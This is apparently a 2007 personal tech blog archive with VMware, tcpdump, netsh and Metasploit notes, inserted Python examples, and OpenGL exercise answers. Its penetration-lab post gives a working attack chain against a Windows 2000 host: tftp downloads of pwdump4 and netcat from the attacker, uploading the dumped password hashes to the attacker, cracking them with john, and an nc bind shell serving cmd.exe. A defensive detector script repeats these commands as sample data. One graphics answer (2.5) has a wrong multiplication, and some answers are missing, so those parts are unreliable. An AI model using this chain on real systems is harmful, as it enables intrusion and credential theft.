Sunday, December 2, 2007

Change VMware MAC Address

1. Edit the *.vmx file
2. Change ethernet0.addressType = "generated" to ethernet0.addressType = "static"
3. Change ethernet0.generatedAddress = "00:0c:29:x:x:x" to ethernet0.Address = "00:0c:29:x:x:x"

VMware MAC address prefixes are:

000569 VMware
000C29 VMware
005056 VMware

000C53 Private
00:0C:53
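
Steps 2 and 3 applied to the text of a .vmx file, as an added example that is not part of the original post. The function names and the sample fragment are constructed for illustration; the range check uses VMware's documented range for manually assigned addresses (00:50:56:00:00:00 to 00:50:56:3F:FF:FF), which the post itself does not state.

```python
import re

# VMware's documented range for manually assigned (static) MAC addresses:
# 00:50:56:00:00:00 through 00:50:56:3F:FF:FF.
_MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$")

def in_static_range(mac):
    """True if mac lies in 00:50:56:00:00:00 - 00:50:56:3F:FF:FF."""
    mac = mac.lower()
    if not _MAC_RE.match(mac):
        return False
    octets = [int(o, 16) for o in mac.split(":")]
    return octets[:3] == [0x00, 0x50, 0x56] and octets[3] <= 0x3F

def make_static(vmx_text, nic="ethernet0"):
    """Apply steps 2 and 3 to the text of a .vmx file.

    Returns (new_text, mac); mac is None if no generated address was found.
    """
    prefix = nic.lower()
    out, mac = [], None
    for line in vmx_text.splitlines():
        key, sep, value = line.partition("=")
        name = key.strip().lower()
        if sep and name == prefix + ".addresstype":
            line = f'{nic}.addressType = "static"'
        elif sep and name == prefix + ".generatedaddress":
            mac = value.strip().strip('"')
            line = f'{nic}.Address = "{mac}"'  # key spelled as in step 3
        out.append(line)
    return "\n".join(out) + "\n", mac

# Constructed sample .vmx fragment (not taken from a real VM).
SAMPLE_VMX = '''ethernet0.present = "TRUE"
ethernet0.addressType = "generated"
ethernet0.generatedAddress = "00:0c:29:12:34:56"
ethernet0.generatedAddressOffset = "0"
'''

if __name__ == "__main__":
    text, mac = make_static(SAMPLE_VMX)
    print(text, end="")
    print("inside VMware static range:", in_static_range(mac))
```
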

http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=507
http://virtrix.blogspot.com/2007/04/vmware-configuring-static-mac-address.html

Tuesday, October 23, 2007

Wednesday, October 3, 2007

Application Security Assessment Methodology



http://www.bgdsoftware.com/security/security_assessment.htm
http://www.counterpane.com/application-security-assessment.html

Friday, July 13, 2007

hping, the packet crafter

tcpdump, the packet analyzer

-n              Don't resolve hostnames
-nn             Don't resolve hostnames or port names
-X              Show the packet's content in both hex & ASCII
-v, -vv, -vvv   Increase the amount of packet information you get back
-c              Only get x number of packets and then stop
-S              Print absolute sequence numbers
-e              Get the Ethernet header as well

tcpdump -nS                    Basic communication
tcpdump -nnvvS                 Basic communication (very verbose)
tcpdump -nnvvSX                A deeper look at the traffic
tcpdump -nnvvSXs <snaplen>     Heavy packet viewing (-s takes the snapshot length in bytes)



http://dmiessler.com/study/tcpdump/

Wednesday, July 11, 2007

TCP Header



http://www.wtcs.org/snmp4tpc/literature.htm

Monday, July 9, 2007

VMWare Images


ISO Images

auditor-150405-04.iso
backtrack-v.1.0-260506.iso
ipcop-install-1.4.10.i386.iso
knoppix-std-0.1.iso
ubuntu-6.10-server-i386.iso

Sunday, July 8, 2007

Installing an SSH Server on Windows

mkpasswd -l [-u <username>] >> ..\etc\passwd

http://www.netadmintools.com/art516.html

hping vs tcpdump (Packet Crafter vs Packet Analyzer / Sniffer)

Prerequisite: you have to know the TCP/IP layers, the protocols and the three-way handshake.

Saturday, July 7, 2007

NETSH - Configure TCP/IP from the command line

Show TCP/IP setting

netsh interface ip show config

Configure static IP

netsh interface ip set address name="Local Area Connection" static 10.21.11.81 255.0.0.0 10.21.11.254 1

Configure DHCP client

netsh interface ip set address "Local Area Connection" dhcp

Configure DNS setting

netsh interface ip set dns "Local Area Connection" static 202.188.0.133

Configure DNS setting 2

netsh interface ip add dns "Local Area Connection" 202.188.1.5 index=2

Configure DNS by DHCP

netsh interface ip set dns "Local Area Connection" dhcp

Configure WINS setting

netsh interface ip set wins "Local Area Connection" static 192.168.0.200

http://www.petri.co.il/configure_tcp_ip_from_cmd.htm

http://thelazyadmin.com/blogs/thelazyadmin/archive/2005/04/04/Using-Netsh-to-Manage-Network-Interfaces-Part-2.aspx

http://cwashington.netreach.net/depo/view.asp?Index=1155&ScriptType=command


Configure IP Address on Backtrack


Command to set

To confirm it


ifconfig eth0 up


Set IP & subnet mask

ifconfig eth0 192.168.1.21 netmask 255.255.255.0

ifconfig eth0


route add default gw 192.168.1.1 eth0



echo nameserver 192.168.1.1 > /etc/resolv.conf

echo nameserver 212.135.1.36 >> /etc/resolv.conf




http://forums.remote-exploit.org/archive/index.php/t-1489.html

Check disk runs every time I reboot my PC

I had the same problem... however, after following the advice, I managed to solve it :)

fsutil dirty query e:
CHKNTFS /X e:
Chkdsk /f /r e:

http://www.experts-exchange.com/Hardware/Desktops/PCs/Q_22623541.html

Wednesday, June 27, 2007

Penetration Tester Lab

First of all, you must have your own machine to hack. In this scenario, I'll set up Windows 2000 SP4 and Red Hat Linux 6.2.

This old version of Linux can be downloaded at

Download Redhat 6.2 here

Installing and Securing IIS Servers

The other machine is Backtrack, which is already installed on my hard disk for attacking purposes.
By default, Windows 2000 SP4 is vulnerable to the LSASS exploit, so make sure you patch your machine accordingly. In this lab, I won't patch it, to show how the attack can be done.

Windows 2000 SP4 - 10.21.11.81
Backtrack (attacker) - 10.21.11.84

On Backtrack, scan Windows 2000 SP4 using nmap

nmap -sT -O 10.21.11.81
nmap -sV 10.21.11.81 -p 23,25,80
nmap -sU 10.21.11.81



cd /pentest/password/dictionaries
gunzip -c wordlist.txt.gz > /tmp/wordlist.txt

Exploit the machine and get the shell.

From the Windows 2000 machine, run

tftp -i 10.21.11.84 get pwdump4.exe
tftp -i 10.21.11.84 get pwdump4.dll
tftp -i 10.21.11.84 get nc.exe


pwdump4 /l /o:pwdump4.txt
tftp 10.21.11.84 put pwdump4.txt

From Backtrack,

cat pwdump4.txt
john -w:wordlist.txt pwdump4.txt
john --show pwdump4.txt
john -w:wordlist.txt -f:NT pwdump4.txt


From Windows,

nc -L -p 2111 -e cmd.exe
telnet 10.21.11.81 2111
whoami


that's it, and GAME OVER
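
From the defender's side, the commands in this lab leave a recognisable trail in process-creation logs. The following added example (not part of the original post) matches them and flags a host where several of them fire together; the rule names, host names and log records are constructed for illustration.

```python
import re
from collections import defaultdict

def classify(cmdline):
    """Return the rule names matched by one process-creation command line."""
    tokens = cmdline.lower().split()
    if not tokens:
        return []
    # Reduce the first token to a bare image name: strip path and ".exe".
    image = tokens[0].replace("\\", "/").rsplit("/", 1)[-1]
    image = image[:-4] if image.endswith(".exe") else image
    args = tokens[1:]
    hits = []
    if image == "tftp" and "get" in args and args[-1].endswith((".exe", ".dll")):
        hits.append("tftp-binary-download")
    if image == "tftp" and "put" in args:
        hits.append("tftp-upload")
    if re.fullmatch(r"pwdump\d*", image):
        hits.append("credential-dump-tool")
    if image in ("nc", "ncat", "netcat") and "-l" in args and "-e" in args:
        hits.append("netcat-exec-listener")
    return hits

def correlate(events, min_rules=2):
    """Collect hits per host; report hosts where several distinct rules fired."""
    per_host = defaultdict(set)
    for host, cmdline in events:
        per_host[host].update(classify(cmdline))
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= min_rules}

# Constructed (host, command line) records, shaped like the command-line field
# of a process-creation audit event. These are not real logs.
SAMPLE_EVENTS = [
    ("WIN2K-LAB", "tftp -i 10.21.11.84 get pwdump4.exe"),
    ("WIN2K-LAB", "tftp -i 10.21.11.84 get nc.exe"),
    ("WIN2K-LAB", "pwdump4 /l /o:pwdump4.txt"),
    ("WIN2K-LAB", "tftp 10.21.11.84 put pwdump4.txt"),
    ("WIN2K-LAB", "nc -L -p 2111 -e cmd.exe"),
    ("FILESRV", "tftp -i 10.21.11.84 get switch-config.txt"),  # benign transfer
    ("FILESRV", "C:\\WINNT\\system32\\ipconfig.exe /all"),
]

if __name__ == "__main__":
    for host, rules in correlate(SAMPLE_EVENTS).items():
        print(host, rules)
```

A single tftp transfer is common on networks that manage switches or boot images, which is why the example only reports a host once at least two distinct rules have fired on it.
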

Wednesday, June 13, 2007

Metasploit: 3.0-beta-dev Guide

Basic format for Metasploit

1. Pick which exploit to use
2. Configure the exploit with remote IP address & port number
3. Pick the payload
4. Configure the payload with local IP address & port number
5. Check / Execute the exploit

Step  Command                      Description
1     show exploits                List all exploits
2     use [exploit name]           Choose
3     show payloads                To check all available payloads
4     set PAYLOAD [payload name]   Set the payload
5     show options                 To check more options that can be set
6     check                        To check whether the host is exploitable or not
7     exploit                      Exploit the host

Sunday, June 3, 2007

Network-based Application Vulnerability Assessment

AppDetective(TM) – Application Security, Inc's (AppSecInc) network-based application vulnerability assessment solution that arms you with the tools needed to secure applications/databases against unauthorized external attacks, unauthorized internal access, password cracking, and various other attacks before they occur.

https://www.appsecinc.com/cgi-bin/download.pl?download=AppDetective

Monday, May 28, 2007

Computer Graphics with OpenGL 3rd Edition













2.4 Consider three different raster systems with resolutions of 640 by 480, 1280 by 1024, and 2560 by 2048. What size frame buffer (in bytes) is needed for each of these systems to store 12 bits per pixel? How much storage is required for each system if 24 bits per pixel are to be stored?

a) (640*480*12) / 8 = 460 800

b) (1280*1024*12) / 8 = 1 966 080

c) (2560*2048*12) / 8 = 7 864 320

d) (640*480*24) / 8 = 921 600

e) (1280*1024*24) / 8 = 3 932 160

f) (2560*2048*24) / 8 = 15 728 640

2.5 Suppose an RGB raster system is to be designed using an 8 inch by 10 inch screen with a resolution of 100 pixels per inch in each direction. If we want to store 6 bits per pixel in the frame buffer, how much storage (in bytes) do we need for the frame buffer?

(800*10000*6) / 8 byte = 60000000 bytes

2.6 How long would it take to load a 640 by 480 frame buffer with 12 bits per pixel, if 10^5 bits can be transferred per second? How long would it take to load a 24-bit per pixel frame buffer with a resolution of 1280 by 1024 using this same transfer rate?

Storage = 640*480*12 = 307200*12 = 3686400 bits

3686400 bits = 100000x

x = 3686400 bits / 100000

= 36.864 seconds

2.7 Suppose we have a computer with 32 bits per word and a transfer rate of 1 mip (one million instructions per second). How long would it take to fill the frame buffer of a 300 dpi (dots per inch) laser printer with a page size of 8 ½ inches by 11 inches?

2.8 Consider two raster systems with resolutions of 640 by 480 and 1280 by 1024. How many pixels could be accessed per second in each of these systems by a display controller that refreshes the screen at a rate of 60 frames per second? What is the access time per pixel in each system?

60*640*480=18432000 pixels. 60*1024*1280=78643200 pixels.

2.9 Suppose we have a video monitor with a display area that measures 12 inches across and 9.6 inches high. If the resolution is 1280 by 1024 and the aspect ratio is 1, what is the diameter of each screen point?

2.10 How much time is spent scanning across each row of pixels during screen refresh on a raster system with a resolution of 1280 by 1024 and a refresh rate of 60k frames per second?
